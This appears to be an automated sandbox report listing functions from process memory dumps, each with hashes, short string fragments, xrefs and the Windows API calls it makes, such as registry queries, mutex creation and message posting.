Instruction ID: 1c23ee4d63c47161a7cc826a4dbef2bb1a7d7cbb64f312d5bd9d6fe97b40b5dc
Opcode Fuzzy Hash: e4154e24eec334436c9eeb8826d92ad811607a219879158b2b0927b8b495709a
Instruction Fuzzy Hash: 9851C735B00211DFDB18DBA4D998ABEB7F2BF88304F218565D5169B250DB70AD42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 051B02E8, Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 051B0537
`5kr, xrefs: 051B03A5

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: :@Dr$`5kr
API String ID: 0-2548079215
Opcode ID: dfb61b78cb9517ec4c20de3351dc090f1439c7dc4f8cf337380e4c09c359eb66
Instruction ID: 2951f92ba4f0cd4207ea9f198e830bc84ebc9ebcb0a3f18026e8836ee0f9153f
Opcode Fuzzy Hash: dfb61b78cb9517ec4c20de3351dc090f1439c7dc4f8cf337380e4c09c359eb66
Instruction Fuzzy Hash: EA516E30A05205CFEB19DF68C458AAE7BF3EF89710F158069D506AB3A1DBB59C01CB52

Uniqueness

Uniqueness Score: -1.00%

Function 051B2D58, Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

, xrefs: 051B2E76
>_Ir, xrefs: 051B2DA5

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: $>_Ir
API String ID: 0-1787506450
Opcode ID: 53ecb856f16662fd189604604aea79bbe6768381d45b896119f145023b232f20
Instruction ID: b52d2bc4c78c5032eae5ebb631d89e3a372050f010566f4767546b3950fec74f
Opcode Fuzzy Hash: 53ecb856f16662fd189604604aea79bbe6768381d45b896119f145023b232f20
Instruction Fuzzy Hash: 0941C339F042058BEB24CF6AC8449FEB7A3BBC5315B25C476C426DB605C3B6E8868752

Uniqueness

Uniqueness Score: -1.00%

Function 051B12A0, Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

$ghr, xrefs: 051B1349

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: d9552872248b61552dd246716e23ef464f8950fa94c39a5b4b546e5861ffe0c5
Instruction ID: ef9e801167123e5eb09e47fbcb39250df5ee2c280f4750ccb41e1c7a7a073ac1
Opcode Fuzzy Hash: d9552872248b61552dd246716e23ef464f8950fa94c39a5b4b546e5861ffe0c5
Instruction Fuzzy Hash: 45220934A00615CFC724DF28C590AAABBF2FF88314F1185ADD85AAB756DB38AD45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 011DAA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 011DAAB1

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 2ce31378d88f4c344b4015757953bbde122c3f77f77c3488f454bc9c5fa820f0
Instruction ID: 794f6f833b8e8448464b82091c6c3f2ed28a06d1fdd3f424579a41d2dcfa3ae6
Opcode Fuzzy Hash: 2ce31378d88f4c344b4015757953bbde122c3f77f77c3488f454bc9c5fa820f0
Instruction Fuzzy Hash: 9531C272504384AFE722CB24DC45F67BFACEF06710F08859BED809B152D264A809C771

Uniqueness

Uniqueness Score: -1.00%

Function 011DAAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,CFEDBC0B,00000000,00000000,00000000,00000000), ref: 011DABB4

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f94d3ee8eba3b0050ce769ee0803a26ee2abe155faffd23b1b8e6baea98a2935
Instruction ID: 1ea3f786f951097d1050d8b46388884d2ca884f9ceeee02b946b89a07a394e28
Opcode Fuzzy Hash: f94d3ee8eba3b0050ce769ee0803a26ee2abe155faffd23b1b8e6baea98a2935
Instruction Fuzzy Hash: 4C31A272509384AFE722CB25DC44F62BFB8EF06310F08889AE985CB253D364E549CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052D00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 052D019D

Memory Dump Source

Source File: 00000016.00000002.613157953.00000000052D0000.00000040.00000001.sdmp, Offset: 052D0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 69d9470f10d0c8012d7c87366ba108437683154bd707f0daf0e83707f30b0196
Instruction ID: 0149c1ea38161c9aeaa159380adb6e80c26967526944ff72ceec5ba167e7ab6a
Opcode Fuzzy Hash: 69d9470f10d0c8012d7c87366ba108437683154bd707f0daf0e83707f30b0196
Instruction Fuzzy Hash: 04319171509780AFE712CB25DC85F56FFF8EF06210F08849AE988CB292E365E909C775

Uniqueness

Uniqueness Score: -1.00%

Function 011DAF50, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E90,?,?), ref: 011DAFEA

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 005ac4123cc55d0a95aabcce3bdcafb4f33778185d1fc10894106b3e7aca10ad
Instruction ID: 0d09aad2202ef58b8a381c08340619908f2b4adc96eb77db72fef2c3edcbefe0
Opcode Fuzzy Hash: 005ac4123cc55d0a95aabcce3bdcafb4f33778185d1fc10894106b3e7aca10ad
Instruction Fuzzy Hash: 8821C87144D3C06FD3138B259C51B22BF74EF87610F0A81DBE984CB553D225A91AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 011DAA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 011DAAB1

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 997a517a9dcf5c2e2d239596567a3ddfb79da372eb803d7d336439ac8ff5710f
Instruction ID: b551bf1a768d53accb5591b9d41d080e39baf1bab30e5fcf2d8dbb14d4fd675c
Opcode Fuzzy Hash: 997a517a9dcf5c2e2d239596567a3ddfb79da372eb803d7d336439ac8ff5710f
Instruction Fuzzy Hash: 6D219D72500604AEE721DB19DD84F6BFBECEF04710F14855BEA459B241D764E9098BB2

Uniqueness

Uniqueness Score: -1.00%

Function 052D012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 052D019D

Memory Dump Source

Source File: 00000016.00000002.613157953.00000000052D0000.00000040.00000001.sdmp, Offset: 052D0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 66381b83d1f15c5a3f0aa1b8d4d43f2a87bede3ff482417eaa3a9eb0c996be3c
Instruction ID: 2d7fe3c31205d15059b0ea1330951fd5293382ab1068622c9290524aa3794e38
Opcode Fuzzy Hash: 66381b83d1f15c5a3f0aa1b8d4d43f2a87bede3ff482417eaa3a9eb0c996be3c
Instruction Fuzzy Hash: 34219D71904200AFE720DF29DD89F6AFBE8EF05710F1484AAED498B251E7B1E504CA75

Uniqueness

Uniqueness Score: -1.00%

Function 011DAB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,CFEDBC0B,00000000,00000000,00000000,00000000), ref: 011DABB4

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 98f8cfddec0df1df67e77282629e425e3090eccb477cef72f6ac40e74b1d55b9
Instruction ID: 87a088f40d06b11441ae2a1c5adfc99f93292e7d97c2c5d929c4792b243b0bea
Opcode Fuzzy Hash: 98f8cfddec0df1df67e77282629e425e3090eccb477cef72f6ac40e74b1d55b9
Instruction Fuzzy Hash: 7C218C71600604AFEB21CF29EC80F67FBECEF04710F08886AEA459B251D7A4E509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 011DA51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DA58A

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8de113244d1b5f267f65f798c84769d842891a777b81d9a4be95f8b1ab003b34
Instruction ID: 8e2327af515983eddfa5552c7f088887d9b7ad0cc0ab42ef37c500dc5b3ff4af
Opcode Fuzzy Hash: 8de113244d1b5f267f65f798c84769d842891a777b81d9a4be95f8b1ab003b34
Instruction Fuzzy Hash: A0117271409380AFDB228F55DC44A62FFF4EF4A210F0885DAEE858B552D375A518DB61

Uniqueness

Uniqueness Score: -1.00%

Function 011DB7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 011DB841

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1dd34fce13ed362e43a1913e900b3ac9b9e66d176a20f55ab5e8b65ebfbaf929
Instruction ID: 4d002a08c6e362a41eefec74f350a126e5d49578467eb92ecb028cd0cdc809f6
Opcode Fuzzy Hash: 1dd34fce13ed362e43a1913e900b3ac9b9e66d176a20f55ab5e8b65ebfbaf929
Instruction Fuzzy Hash: C7219D724097C09FDB238B25DC51AA2BFB0EF07224F0D84DAEDC54F163D265A958DB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DBB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 011DBBB9

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9fba69db7ea995057b9c229e8ed57f195363753fe8518881fdbe941884ba6841
Instruction ID: 3eaafc3d4332df4a60a01348966c47b4b6fc4a2be37c301119cf7ff3c6237664
Opcode Fuzzy Hash: 9fba69db7ea995057b9c229e8ed57f195363753fe8518881fdbe941884ba6841
Instruction Fuzzy Hash: EA11BE35409380AFDB228F25DC45A52FFB4EF06220F0884DEED858B563D265A458DB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DBE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 011DBE70

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 611fed5a7a199b3b5e4c50d473414d1eb7ed7b34da1c88a522395920133309f9
Instruction ID: 9acb3011ee8a2773d635a8e43f009d1fcd1f12c93ff88ad275903a6e2a961bba
Opcode Fuzzy Hash: 611fed5a7a199b3b5e4c50d473414d1eb7ed7b34da1c88a522395920133309f9
Instruction Fuzzy Hash: D6118E7540D3C0AFDB138B25DC44B61BFB4EF47624F0984DAED858F263D2656808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DB71E, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 011DB78A

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 30c3195c701263b022ec402c2cd7747a7c6100f39bbcc0284edd07d3c892dd83
Instruction ID: d4b1085780b6d7c1bce64240405ffaf5601dcbdbd9cef675b6b0d84ec34b3d99
Opcode Fuzzy Hash: 30c3195c701263b022ec402c2cd7747a7c6100f39bbcc0284edd07d3c892dd83
Instruction Fuzzy Hash: A5119D32408780AFDB228F54DC44A52FFF4EF4A220F09849EEA898B562D375A418CB61

Uniqueness

Uniqueness Score: -1.00%

Function 011DBEB4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 011DBF0C

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 7bfcc3585eeaac36bbd14a33b21102f8644f2b3ceaba0523ba08436fae00359b
Instruction ID: deefef034d98ea14e8f7e8ecf49702f85f766547c20c2779f56beac209adf27b
Opcode Fuzzy Hash: 7bfcc3585eeaac36bbd14a33b21102f8644f2b3ceaba0523ba08436fae00359b
Instruction Fuzzy Hash: A71191715093809FD715CF29DC85B52BFE8EF46220F0980EAED49CF252D275E848CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DA75B, Relevance: 1.6, APIs: 1, Instructions: 52comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 011DA7BC

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2f727208ea24e409d61d22a975be3e3e95a4403bd6d564d3be395391c0989f4d
Instruction ID: c5ffcc8a8374c75cc6ad7e31ed9e49f7ca80d357f40de25df3a9780455bc45be
Opcode Fuzzy Hash: 2f727208ea24e409d61d22a975be3e3e95a4403bd6d564d3be395391c0989f4d
Instruction Fuzzy Hash: 8B11A371449384AFD712CF15DC45B52BFB4EF42224F0984EBED498F253D279A548CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DA8CC, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 011DA926

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: bec6aad0b72a8b768d54eb4e249d0127332d2060f50e464b033f49de1cef6af5
Instruction ID: edd688803bf5264baf5b4be192f325698ab215f45de2499dabdc31606f82e004
Opcode Fuzzy Hash: bec6aad0b72a8b768d54eb4e249d0127332d2060f50e464b033f49de1cef6af5
Instruction Fuzzy Hash: 73118E75409784AFD722CF15DC85A52FFB4EF06220F09C4DAEE894B263D375A819CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DBED2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 011DBF0C

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 983b88f50cd1ad5b45e4d167312819d059ad648333263c9b1d1acaf22e5bb205
Instruction ID: fbe654acb4560a380f2340dbca50c9aa2ef446475831d8713a3b2b9651d27e5c
Opcode Fuzzy Hash: 983b88f50cd1ad5b45e4d167312819d059ad648333263c9b1d1acaf22e5bb205
Instruction Fuzzy Hash: A3017171A046409FDB14DF29D885766FF98EF05220F08C4EADE4ACB646E775E408CF66

Uniqueness

Uniqueness Score: -1.00%

Function 011DB746, Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32 ref: 011DB78A

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 6faecdaa32d8ba80dac3bfe30a10e2fad03eb4c48528f03bc8a054a50af341e3
Instruction ID: bfcd7b561c1842aa3ae5461af88d4d8ef3db0d2ae3fc056ba93976bb04c68f77
Opcode Fuzzy Hash: 6faecdaa32d8ba80dac3bfe30a10e2fad03eb4c48528f03bc8a054a50af341e3
Instruction Fuzzy Hash: 18016D31404A00EFDB218F95D944B56FFE4FF09720F0985AAEE4A4B652D376E018DB66

Uniqueness

Uniqueness Score: -1.00%

Function 011DA546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DA58A

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 75e535bbe66b6fee5d530774a5213d191ba32fa3edd78c3d56489ac2bd49dc6b
Instruction ID: ad6306d21c59783ae8d601326624b1dd9add373cd4e48e8b9193e3c14054c479
Opcode Fuzzy Hash: 75e535bbe66b6fee5d530774a5213d191ba32fa3edd78c3d56489ac2bd49dc6b
Instruction Fuzzy Hash: 5B015B31400600AFDB21CF55E944B56FFE4EF08320F08859AEE498B612D376A018DF62

Uniqueness

Uniqueness Score: -1.00%

Function 011DAF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E90,?,?), ref: 011DAFEA

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4268dd3bfa5d36b0d50c9ec80b328df1beeab1a0984133b4fc376f79a55e2c36
Instruction ID: b9dcc79eb46eafa969d916bf7b63625171c4ec2de9fed1edf0985212c52b9cad
Opcode Fuzzy Hash: 4268dd3bfa5d36b0d50c9ec80b328df1beeab1a0984133b4fc376f79a55e2c36
Instruction Fuzzy Hash: 1D016275500600ABD610DF16DC86F26FBA4FB88B20F14815AED085B741E775F516CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 011DBB7E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 011DBBB9

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aad8658f28cfa5c952f072c30b12e486c815ffa821c0942639f7319e0b91b58e
Instruction ID: 78fa5c531050f95a7b667dd309aac625f46f03dc895aa79d23ce47f1564a72ff
Opcode Fuzzy Hash: aad8658f28cfa5c952f072c30b12e486c815ffa821c0942639f7319e0b91b58e
Instruction Fuzzy Hash: 8401B135504600DFDB258F19D844B66FFA0EF05320F08C09ADD4A8B626D371E418CB66

Uniqueness

Uniqueness Score: -1.00%

Function 011DA78A, Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 011DA7BC

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6f09cab445dc0f625342fbd90d36662e205499ad92ddb3a5697efd38576f49f5
Instruction ID: 247cc703de3574a00f0628a8c782deb6eb09a81bf4179a426b4ea1576bfbd751
Opcode Fuzzy Hash: 6f09cab445dc0f625342fbd90d36662e205499ad92ddb3a5697efd38576f49f5
Instruction Fuzzy Hash: DE01AD75804640DFDB14CF19E984762FFA4EF00220F08C4AADE098F602D3BAA508CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 011DB806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 011DB841

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b98c0ff0c12eb35113bd661f6eb43f270cdc44ac58b51cc29d645abfa9887e15
Instruction ID: 172f021f71cd703ece5fa2df008479f99d3d092a26f13ea640b663de6c93f21a
Opcode Fuzzy Hash: b98c0ff0c12eb35113bd661f6eb43f270cdc44ac58b51cc29d645abfa9887e15
Instruction Fuzzy Hash: D0018F31804644DFDB258F16D885B66FFA0EF05320F08C49ADE4A4B626D375A418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011DA8EE, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 011DA926

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a65a6f7f375f2b6f611521881ed74f950171eb5b5822ca1946c9f6f23f5087c0
Instruction ID: 15352dd9cdb17e3dc7ee8c2805ab18b4240d709a96e73c8c9f3cacd89f547abc
Opcode Fuzzy Hash: a65a6f7f375f2b6f611521881ed74f950171eb5b5822ca1946c9f6f23f5087c0
Instruction Fuzzy Hash: EC01D135800604DFDB29CF09E885752FFA0EF05320F08C4AADE8A4B612D3B5A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 011DBE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 011DBE70

Memory Dump Source

Source File: 00000016.00000002.610672932.00000000011DA000.00000040.00000001.sdmp, Offset: 011DA000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 27fa4cc16a528d631a0eb92a5ac4d2666d02a9b13f6006943c3f3a74d729ca7e
Instruction ID: 9606f075fb85167461eaec6cef26419814a4dd776d57441c0e523989e9626799
Opcode Fuzzy Hash: 27fa4cc16a528d631a0eb92a5ac4d2666d02a9b13f6006943c3f3a74d729ca7e
Instruction Fuzzy Hash: 2CF0C235808644DFDB24CF0AD884762FFA0EF05320F08D4AADE4A4B312D3B5A408CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 051B20D0, Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

r*+, xrefs: 051B230F

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: r*+
API String ID: 0-3221063712
Opcode ID: 332c9a063f4ab07b8ab9e7dc9c1c82eb638f036a0055e74dd26da1e5ea1a124c
Instruction ID: d90f239b3f983e1ec5a8f9c685155b10d93e83cea2a691579267a87bb01195a9
Opcode Fuzzy Hash: 332c9a063f4ab07b8ab9e7dc9c1c82eb638f036a0055e74dd26da1e5ea1a124c
Instruction Fuzzy Hash: 9C717D34A08205DFEB58DFA4C584ABEBBF2FF84300F1180AAD522DB265D7B49D49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 051B1458, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

$ghr, xrefs: 051B14C7

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: 008891e9ea27c4aaa6793ce78fed0559e7a5f67d4ae335dd680351092a2ed2d9
Instruction ID: eee017495c36f7397db6d692c368300317f3c3c3088b1ebf77a4d4b13024402a
Opcode Fuzzy Hash: 008891e9ea27c4aaa6793ce78fed0559e7a5f67d4ae335dd680351092a2ed2d9
Instruction Fuzzy Hash: 4851E534A04218CFDB54DF64C994B9DBBB2BF49304F1140EAD40AAB366CB799E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 051B1290, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

$ghr, xrefs: 051B1349

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: 7729e11bda943b384cd901178b5a0d5e4919dde7f2b02c3769d924ebed4d7685
Instruction ID: c9ed4f89000e8cf4cb12d52832e8ee5c7d4d32f7a540ccdcc3c531f4c890b2ed
Opcode Fuzzy Hash: 7729e11bda943b384cd901178b5a0d5e4919dde7f2b02c3769d924ebed4d7685
Instruction Fuzzy Hash: 83411634E04218DFDB68DF68C894BADBBB2BF49344F1141AAD40AAB351DB749D80CF51

Uniqueness

Uniqueness Score: -1.00%

Function 051B2BF8, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c7b8ca4264df9745436e9f285c2047fc6e91c8a22691062515f483fae773f7
Instruction ID: 8ae69920fdd52bf32eb13f0252abf863c267bab1963939e72f21202766d882e7
Opcode Fuzzy Hash: 99c7b8ca4264df9745436e9f285c2047fc6e91c8a22691062515f483fae773f7
Instruction Fuzzy Hash: 2A41143460D344CFD33AC764C8949F87FB6AF46214B0649ABD066CF262C3B59D09C752

Uniqueness

Uniqueness Score: -1.00%

Function 051B0BC0, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202f45910666d7545ea256e34e74c2a5ea50f22a687fe9ce1281af6713184b4c
Instruction ID: 693911f544b9869245cea2eff317393d58d39be1a9c514e7bd34c03d90f0d5f6
Opcode Fuzzy Hash: 202f45910666d7545ea256e34e74c2a5ea50f22a687fe9ce1281af6713184b4c
Instruction Fuzzy Hash: B2418431B041149FD719DF28C4146AF7BE7AFC9310F1684AAE906EF2A5CFB19D058791

Uniqueness

Uniqueness Score: -1.00%

Function 051B0682, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d29803da57840175bd126d74d814a31c98a85d5a8bee82e97f73e594a98b4f
Instruction ID: d6c58c3e3bad2e3b553d89327618aa975e8bbf79b467214cb6228092ee42da30
Opcode Fuzzy Hash: d5d29803da57840175bd126d74d814a31c98a85d5a8bee82e97f73e594a98b4f
Instruction Fuzzy Hash: C14148306042028BE72DBBF8E91C66E3BA6BF84701B15457AF512DE2E8DF744C818BD5

Uniqueness

Uniqueness Score: -1.00%

Function 051B02DA, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38fcf4e022fb1238a88cbba46e6038cb9d3c6498032d8acdfb6831c16979490b
Instruction ID: 04917e36f63c09a884c2f267c415b7d95bebfd8496ca5bb5c15fe74cafd65759
Opcode Fuzzy Hash: 38fcf4e022fb1238a88cbba46e6038cb9d3c6498032d8acdfb6831c16979490b
Instruction Fuzzy Hash: E0413A30A01605CFEB18CBA8C558FAE7BF2FF89710F158469D502AB7A0DBB1AC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 051B0006, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f426f9eec3b3a5b2a76cd4e759a5af2315310a4d4c9706b25054854480c975f
Instruction ID: 00d63c2dd7650a0f73875c1ca3ecb2b03f5bee60c313c3ef35361ca6879ee558
Opcode Fuzzy Hash: 5f426f9eec3b3a5b2a76cd4e759a5af2315310a4d4c9706b25054854480c975f
Instruction Fuzzy Hash: A8313C30509381CFCB1ADFB4C8989593FF2FF56214B4589AED491CB266EB789C45CB22

Uniqueness

Uniqueness Score: -1.00%

Function 051B21E9, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.611960176.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c14dfe0707632e95541e4f6f1592ebc6b1656343d425b734fa6a4251f25e83e
Instruction ID: 66fe335881658c4c548f865bc3320d14d0577903d1c894418479531b18adf0e3
Opcode Fuzzy Hash: 0c14dfe0707632e95541e4f6f1592ebc6b1656343d425b734fa6a4251f25e83e
